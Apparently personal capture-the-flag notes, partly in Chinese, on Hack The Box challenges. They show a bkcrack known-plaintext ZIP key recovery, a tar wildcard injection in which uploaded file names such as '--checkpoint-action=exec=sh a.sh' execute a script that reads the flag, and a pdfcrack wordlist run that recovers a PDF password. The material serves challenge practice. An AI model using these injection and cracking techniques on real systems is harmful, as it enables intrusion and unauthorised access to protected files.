PS C:\Users\mikannse\Desktop\bkcrack-1.7.0-win64> .\bkcrack.exe -C .\ingredients.zip -c tmp/72728dae00fcc05fc62ae89dc0842f66/ingredients.txt -p .\plaintext.txt bkcrack 1.7.0 - 2024-05-26 [23:09:06] Z reduction using 4 bytes of known plaintext 100.0 % (4 / 4) [23:09:06] Attack on 1303249 Z values at index 6 Keys: f52e5c12 fe26c8f1 dca2f504 95.8 % (1247977 / 1303249) Found a solution. Stopping. You may resume the attack with the option: --continue-attack 1247977 [23:18:18] Keys f52e5c12 fe26c8f1 dca2f504
但是没搜寻到…(代填坑)
Micro Storage
┌──(mikannse㉿kali)-[~/HTB/secret] └─$ nc 83.136.255.40 30366 .-------------------------------------------------------------------------------------. | ___ ____ _____ _ __ _____ | | | \/ (_) / ___| | / | | _ | | | | . . |_ ___ _ __ ___ \ `--.| |_ ___ _ __ __ _ __ _ ___ __ __`| | | |/' | | | | |\/| | |/ __| '__/ _ \ `--. \ __/ _ \| '__/ _` |/ _` |/ _ \ \ \ / / | | | /| | | | | | | | | (__| | | (_) | /\__/ / || (_) | | | (_| | (_| | __/ \ V / _| |_\ |_/ / | | \_| |_/_|\___|_| \___/ \____/ \__\___/|_| \__,_|\__, |\___| \_/ \___(_)___/ | | B y H a c k T h e B o x L a b s __/ | | | |___/ | `-----------------------. .-------------------------' | Welcome to your online temporary | | Micro Storage | `-----------------------------------'
\!/ WARNING \!/ Your storage only lasts during the ongoing session, once the session killed, all your files will be gone. Use this service responsibly. ---------o---------
1 => Upload a new file (10 file(s) remaining) 2 => List your uploaded files (0 file(s) uploaded so far) 3 => Delete a file 4 => Print file content 5 => Compress and download all your files 0 => Quit (you will lose your files!) >>> Choose an option:
可以做以上操作,随便写一点然后压缩写在下来,base64解码之后发现是一个tar包
那么猜测使用的像是 tar -cf * 的命令,那么显然可以用检查点的方式来执行脚本命令了
1 => Upload a new file (10 file(s) remaining) 2 => List your uploaded files (0 file(s) uploaded so far) 3 => Delete a file 4 => Print file content 5 => Compress and download all your files 0 => Quit (you will lose your files!) >>> Choose an option: 1 [*] Enter your file name: a.sh [*] Start typing your file content: (send 'EOF' when done) cat /flag.txtEOF [+] Your file "a.sh" has been saved. (13 bytes written) 1 => Upload a new file (9 file(s) remaining) 2 => List your uploaded files (1 file(s) uploaded so far) 3 => Delete a file 4 => Print file content 5 => Compress and download all your files 0 => Quit (you will lose your files!) >>> Choose an option: 1 [*] Enter your file name: --checkpoint=1 [*] Start typing your file content: (send 'EOF' when done) 1EOF [+] Your file "--checkpoint=1" has been saved. (1 bytes written) 1 => Upload a new file (8 file(s) remaining) 2 => List your uploaded files (2 file(s) uploaded so far) 3 => Delete a file 4 => Print file content 5 => Compress and download all your files 0 => Quit (you will lose your files!) >>> Choose an option: 1 [*] Enter your file name: --checkpoint-action=exec=sh a.sh [*] Start typing your file content: (send 'EOF' when done) 1EOF [+] Your file "--checkpoint-action=exec=sh a.sh" has been saved. (1 bytes written) 1 => Upload a new file (7 file(s) remaining) 2 => List your uploaded files (3 file(s) uploaded so far) 3 => Delete a file 4 => Print file content 5 => Compress and download all your files 0 => Quit (you will lose your files!) >>> Choose an option: 5
┌──(mikannse㉿kali)-[~/Desktop] └─$ pdfcrack -w /usr/share/wordlists/rockyou.txt -f "0ld is g0ld.pdf" PDF version 1.6 Security Handler: Standard V: 2 R: 3 P: -1060 Length: 128 Encrypted Metadata: True FileID: 5c8f37d2a45eb64e9dbbf71ca3e86861 U: 9cba5cfb1c536f1384bba7458aae3f8100000000000000000000000000000000 O: 702cc7ced92b595274b7918dcb6dc74bedef6ef851b4b4b5b8c88732ba4dac0c Average Speed: 64605.2 w/s. Current Word: 'sheena1234' Average Speed: 64316.3 w/s. Current Word: 'yorrej' Average Speed: 64684.4 w/s. Current Word: 'sexykelly4' Average Speed: 64416.8 w/s. Current Word: 'nearykalyan' Average Speed: 66907.1 w/s. Current Word: 'kobngangko' found user-password: 'jumanji69'
